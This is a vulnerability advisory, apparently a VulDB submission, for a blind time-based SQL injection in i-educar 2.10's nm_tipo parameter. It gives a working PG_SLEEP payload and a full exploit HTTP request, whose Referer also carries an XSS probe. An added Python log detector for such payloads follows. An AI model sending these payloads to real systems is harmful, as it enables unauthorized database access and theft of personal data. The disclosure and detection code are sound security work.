| Title | Portabilis i-educar 2.10 SQL Injection |
|---|---|

**Description:**

# SQL Injection (Blind Time-Based) Vulnerability in nm_tipo Parameter on educar_tipo_usuario_lst.php Endpoint
---
## Summary
A SQL Injection vulnerability was identified in the `educar_tipo_usuario_lst.php` endpoint of the _i-educar_ application, specifically in the `nm_tipo` parameter. This vulnerability allows attackers to execute arbitrary SQL commands on the backend database, potentially compromising the confidentiality, integrity, and availability of application data.
---
## Details
**Vulnerable Endpoint:** `/educar_tipo_usuario_lst.php`
**Parameter:** `nm_tipo`
To reach the vulnerable functionality, navigate to **Configurations > Permissions > User Types**.
Additionally, exploiting this vulnerability requires an account with permissions to **create/list users and user types**.
The application fails to properly validate and sanitize user input in the `nm_tipo` parameter. As a result, attackers can inject crafted SQL payloads that are executed directly by the database. This could allow database enumeration, data exfiltration, modification, or denial of service via time-based delays.
---
## PoC
**Payload:**
`'%20AND%208767%3D(SELECT%208767%20FROM%20PG_SLEEP(10))%20OR%20'EgwO'%3D'pMdZ`
**Decoded Payload:**
`' AND 8767=(SELECT 8767 FROM PG_SLEEP(10)) OR 'EgwO'='pMdZ`
This payload triggers a **10-second delay** in the server response, demonstrating that the parameter is vulnerable to blind time-based SQL injection.
**Example Request:**
```http
GET /intranet/educar_tipo_usuario_lst.php?busca=S&nm_tipo=1'%20AND%208767%3D(SELECT%208767%20FROM%20PG_SLEEP(10))%20OR%20'EgwO'%3D'pMdZ&descricao=1&nivel=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Referer: http://localhost/intranet/educar_tipo_usuario_lst.php?busca=S&nm_tipo=%22%3E%3Csvg+onload%3Dalert%2812%29%3E&descricao=%22%3E%3Csvg+onload%3Dalert%2812%29%3E&nivel=-1
Cookie: grav-admin-flexpages=eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319; grav-tabs-state={%22tab--f0e041eed24f87f2b6b02fd6924d0a08%22:%22data.languages%22%2C%22tab-flex-pages-e838602f51515c83bca06a8ae758ce52%22:%22data.security%22%2C%22tab-flex-pages-b6676b27f5cdf6b6c22f8e18da4259a0%22:%22data.advanced%22%2C%22tab-flex-pages-raw-8f0a83a672754f7823714134334b1de8%22:%22data.content%22%2C%22tab-flex-pages-dc26c564cb2116d77bda5fff24ba90dc%22:%22data.security%22%2C%22tab-flex_conf-user_groups-accounts-02f0e9f68f41a0648ed530f80bd72c06%22:%22data.cache%22%2C%22tab-flex-pages-raw-9a0364b9e99bb480dd25e1f0284c8555%22:%22data.content%22%2C%22tab-flex-pages-e91e6348157868de9dd8b25c81aebfb9%22:%22data.security%22%2C%22tab--8cc45760590da203c5fc3568ecbabd66%22:%22data.routes%22%2C%22tab--7a2ac3477f8ad14aa750831441325a16%22:%22data.facebook%22}; i_educar_session=hRnVO9PXmAH7dVAd7DsTeTgExwM6ccdtZZaCcpob
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
```
Observe the increased server response time, confirming that the injected SQL command was executed.
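As an added detection example (not part of the advisory or of the i-educar project), the following Python flags requests to the affected endpoint whose query parameters carry time-based SQL injection indicators such as the `PG_SLEEP` payload above, and corroborates a hit with the measured response time. It assumes a combined access-log format with a trailing request-duration field; the log lines are constructed.

```python
"""Flag blind time-based SQLi attempts against educar_tipo_usuario_lst.php in access logs.
Added example (not i-educar code); assumes combined log format plus a trailing duration field."""
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

INDICATORS = [  # (pattern, label); PG_SLEEP is the PostgreSQL primitive in the advisory's payload
    (re.compile(r"\b(pg_sleep|sleep|benchmark|waitfor\s+delay)\b", re.I), "time-delay function"),
    (re.compile(r"'\s*(and|or)\s+", re.I), "quote-breaking boolean"),  # e.g.  ' AND 8767=(
]
LOG_RE = re.compile(  # combined log format + request duration in seconds (assumed)
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<secs>[\d.]+)$'
)
SAMPLE_LOG = [  # constructed lines
    # the advisory's payload in nm_tipo; the server took ~10 s to answer
    '10.0.0.5 - - [09/Aug/2025:18:31:40 +0000] "GET /intranet/educar_tipo_usuario_lst.php'
    '?busca=S&nm_tipo=1%27%20AND%208767%3D(SELECT%208767%20FROM%20PG_SLEEP(10))%20OR%20'
    '%27EgwO%27%3D%27pMdZ&descricao=1&nivel=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 10.412',
    # legitimate search for a user type named "Professor"
    '10.0.0.7 - - [09/Aug/2025:18:32:01 +0000] "GET /intranet/educar_tipo_usuario_lst.php'
    '?busca=S&nm_tipo=Professor&descricao=&nivel=1 HTTP/1.1" 200 4870 "-" "Mozilla/5.0" 0.087',
]

def suspicious_params(target, secs=0.0, slow_threshold=5.0):
    """Return {param: reason} for query params of the affected endpoint that carry
    time-based SQLi indicators; a delay >= slow_threshold is appended as corroboration."""
    parts = urlsplit(target)
    if not parts.path.endswith("/educar_tipo_usuario_lst.php"):
        return {}  # other endpoints are out of scope for this rule
    hits = {}
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for raw in values:
            value = unquote_plus(raw)  # second decode pass catches double-encoded payloads
            reasons = [label for rx, label in INDICATORS if rx.search(value)]
            if reasons:
                if secs >= slow_threshold:
                    reasons.append(f"slow response ({secs:.1f}s)")
                hits[name] = ", ".join(reasons)
    return hits

def scan_log(lines, slow_threshold=5.0):
    """Return [(ip, param, reason), ...] for every flagged request in `lines`."""
    flagged = []
    for m in filter(None, map(LOG_RE.match, lines)):
        secs = float(m.group("secs"))
        for param, reason in suspicious_params(m.group("target"), secs, slow_threshold).items():
            flagged.append((m.group("ip"), param, reason))
    return flagged
```

A matching alert is evidence of an attempt, not of success; the fix remains parameterized queries for `nm_tipo` and the sibling filter parameters.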
---
## Impact
- **Unauthorized data access:** Reading sensitive information such as credentials, personal data, or configuration details
- **Database enumeration:** Extracting database schema, tables, and column details
- **Data manipulation:** Adding, modifying, or deleting database records
- **Denial of Service (DoS):** Using time-based queries to impact system availability
- **Potential escalation to RCE:** If combined with other vulnerabilities and specific database features
| Source | https://github.com/marcelomulder/CVE/blob/main/i-educar/SQL%20Injection%20(Blind%20Time-Based)%20Vulnerability%20in%20nm_tipo%20Parameter%20on%20educar_tipo_usuario_lst.php%20Endpoint.md |
|---|---|
| User | marceloQz (UID 87549) |
| Submission | 2025-08-10 00:12 (11 months ago) |
| Moderation | 2025-08-20 12:55 (11 days later) |
| Status | Accepted |
| VulDB Entry | 320769 [Portabilis i-Educar up to 2.10 User Types Page educar_tipo_usuario_lst.php nm_tipo/descrição SQL injection] |
| Points | 20 |